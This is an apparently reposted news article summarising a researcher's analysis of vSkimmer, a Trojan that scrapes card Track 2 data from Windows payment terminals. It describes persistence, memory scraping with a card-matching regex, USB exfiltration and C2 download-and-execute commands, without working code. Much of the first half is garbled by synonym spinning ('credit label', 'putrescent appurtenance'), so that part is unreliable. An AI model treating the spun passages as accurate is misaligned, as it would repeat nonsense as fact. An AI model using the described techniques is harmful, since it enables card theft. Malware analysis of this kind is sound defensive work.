VSkimmer Botnet Targets Credit Card Payment Terminals

While monitoring a Russian subterraneous forum recently, we came opposite a contention about a Trojan for sale that can take credit label information from machines regulating Windows for financial exchange and credit label payments. The malware, vSkimmer, can detect a label readers, squeeze all a information from a Windows machines trustworthy to these readers, and send that information to a control server. The author of a thread also discusses other capabilities of this malware, that appears to be a inheritor of Dexter, though with additional functions.












We already know about botnets such as Zeus and SpyEye, that perform financial rascal regulating intensely worldly techniques including  intercepting a victims’ banking transactions. VSkimmer  is another instance of how financial rascal is actively elaborating and how financial Trojans are grown and upheld around in a subterraneous community. This botnet is quite engaging since it directly targets card-payment terminals regulating Windows.
Our Automated Botnet Replication Framework initial saw this Trojan on Feb 13. We’ve analyzed  samples of this malware and figured out how it steals a credit label information and a additional control functionalities. While behaving a API tracing , we found it uses sincerely customary antidebugging techniques:



The malware collects a following information from a putrescent appurtenance and sends it to a control server:

• Machine GUID from a Registry
• Locale info
• Username
• Hostname
• OS version

This malware uses a customary designation resource and copies itself as svchost.exe into %APPDATA% , modifies a registry pivotal to supplement itself underneath a certified list of apps, and runs ShellExecute to launch a process. One duty of vSkimmer if a Internet is not accessible is to wait for a USB device with a volume name KARTOXA007  to be connected to a putrescent appurtenance and to duplicate all a logs with a record name dumz.log and a label info collected from a plant to a USB drive.


I checked by disconnecting from a Internet: The malware enumerated all a drives and combined a record dumz.log in a expostulate with a preceding name.


Extracting credit label information
VSkimmer maintains a whitelisted process, that it skips while enumerating a regulating processes on a putrescent machine.


Once vSkimmer finds any regulating slight not in a whitelist, it runs OpenProcess and ReadProcessMemory to review a memory pages of a slight and invokes a pattern-matching algorithm to compare a unchanging countenance “?[3-9]{1}[0-9]{12,19}[D=\u0061][0-9]{10,30}\??”)” and remove a label info review by a remuneration devices. This is finished recursively for each slight regulating in a putrescent appurtenance and not on a whitelist.


VSkimmer control
Before communicating with a control server, a malware B64-encodes all a appurtenance information collected and appends it to a URI. The encoded fibre follow this format:

• machine guid|build_id|bot_version|Windows_version|Host_name|User_Name

Next, vSkimmer creates a HTTP ask and connects to a control server:



While this malware ran, we saw a following response. Note that a commands are within a cmd /cmd tag.



Once vSkimmer receives a response from a server, it executes a following slight to parse a command:




Because a response from a server during execution was cmdnull/cmd, a malware extracts a 3-byte authority and tries to compare it with a other commands implemented by vSkimmer. First it checks if a authority from a server is “dlx.”



If not, afterwards vSkimmer checks for a “upd” command. These commands exercise a HTTP download and govern (“dlx”) and refurbish of a bot (“upd”), respectively.
As we saw progressing in this post, vSkimmer can also squeeze a Track 2 information stored on a captivating frame of a credit cards. This lane stores all a label information including a label number. (You can review some-more about a Track 2 information format on Wikipedia. The arch information:

• Primary Account Number: a series printed on a front of a card
• Expiration Date
• Service Code: a three-digit number

VSkimmer bot control panel
Here’s a demeanour during a control row of a authority server:

On credit card information grabbing the post states:

“VSkimmer maintains the whitelisted process, which it skips while enumerating the running processes on the infected machine.Once vSkimmer finds any running process not in the whitelist, it runs OpenProcess and ReadProcessMemory to read the memory pages of the process and invokes the pattern-matching algorithm to match the regular expression “?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??”)” and extract the card info read by the payment devices. This is done recursively for every process running in the infected machine and not on the whitelist.”

VSkimmer demonstrated the great interest of cyber crime in payments sector institutions have already been attacked in the past by malicious code such as Zeus and SpyEye and this case is just “another example of how financial fraud is actively evolving and how financial Trojans were developed and passed around in the underground community.” This botnet is particularly interesting because it directly targets card-payment terminals running Windows,” Shah explained in his post, I found really interesting the fact that the offer of similar malware in the underground is increasing and their model of sale is reaching level of excellence never seen first ... we face difficult times.

Posted in: hacking news